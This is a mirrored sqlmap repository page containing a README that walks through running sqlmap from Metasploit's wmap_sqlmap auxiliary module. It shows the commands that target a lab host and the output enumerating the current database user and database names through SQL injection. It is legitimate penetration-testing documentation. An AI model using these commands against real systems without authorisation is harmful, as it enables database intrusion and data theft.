mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-25 11:03:47 +03:00
.. | ||
README | ||
wmap_sqlmap.rb |
To use Metasploit's sqlmap auxiliary module launch msfconsole and follow the example below: $ ./msfconsole _ _ _ _ | | | | (_) | _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_ | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __| | | | | | | __/ || (_| \__ \ |_) | | (_) | | |_ |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__| | | |_| =[ msf v3.2-testing + -- --=[ 308 exploits - 173 payloads + -- --=[ 20 encoders - 6 nops =[ 75 aux msf > use auxiliary/scanner/http/wmap_sqlmap msf auxiliary(wmap_sqlmap) > set RHOSTS 192.168.1.121 RHOSTS => 192.168.1.121 msf auxiliary(wmap_sqlmap) > set PATH /sqlmap/mysql/get_int.php PATH => /sqlmap/mysql/get_int.php msf auxiliary(wmap_sqlmap) > set QUERY id=1 QUERY => id=1 msf auxiliary(wmap_sqlmap) > set OPTS '--dbs --current-user' OPTS => --dbs --current-user msf auxiliary(wmap_sqlmap) > set SQLMAP_PATH /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py msf auxiliary(wmap_sqlmap) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- BATCH true yes Never ask for user input, use the default behaviour DATA no The data string to be sent through POST METHOD GET yes HTTP Method OPTS --dbs --current-user no The sqlmap options to use PATH /sqlmap/mysql/get_int.php yes The path/file to test for SQL injection Proxies no Use a proxy chain QUERY id=1 no HTTP GET query RHOSTS 192.168.1.121 yes The target address range or CIDR identifier RPORT 80 yes The target port SQLMAP_PATH /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py yes The sqlmap >= 0.6.1 full path SSL false no Use SSL THREADS 1 yes The number of concurrent threads VHOST no HTTP server virtual host msf auxiliary(wmap_sqlmap) > run [*] exec: /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py -u 'http://192.168.1.121/sqlmap/mysql/get_int.php?id=1' --method GET --dbs --current-user --batch SQLMAP: SQLMAP: sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com> SQLMAP: and Daniele Bellucci <daniele.bellucci@gmail.com> SQLMAP: SQLMAP: [*] starting at: 01:31:41 SQLMAP: SQLMAP: [01:31:42] [WARNING] User-Agent parameter 'User-Agent' is not dynamic SQLMAP: back-end DBMS: MySQL >= 5.0.0 SQLMAP: SQLMAP: current user: 'testuser@localhost' SQLMAP: SQLMAP: available databases [4]: SQLMAP: [*] information_schema SQLMAP: [*] mysql SQLMAP: [*] privatedb SQLMAP: [*] test SQLMAP: SQLMAP: SQLMAP: [*] shutting down at: 01:31:44 SQLMAP: [*] Auxiliary module execution completed msf auxiliary(wmap_sqlmap) >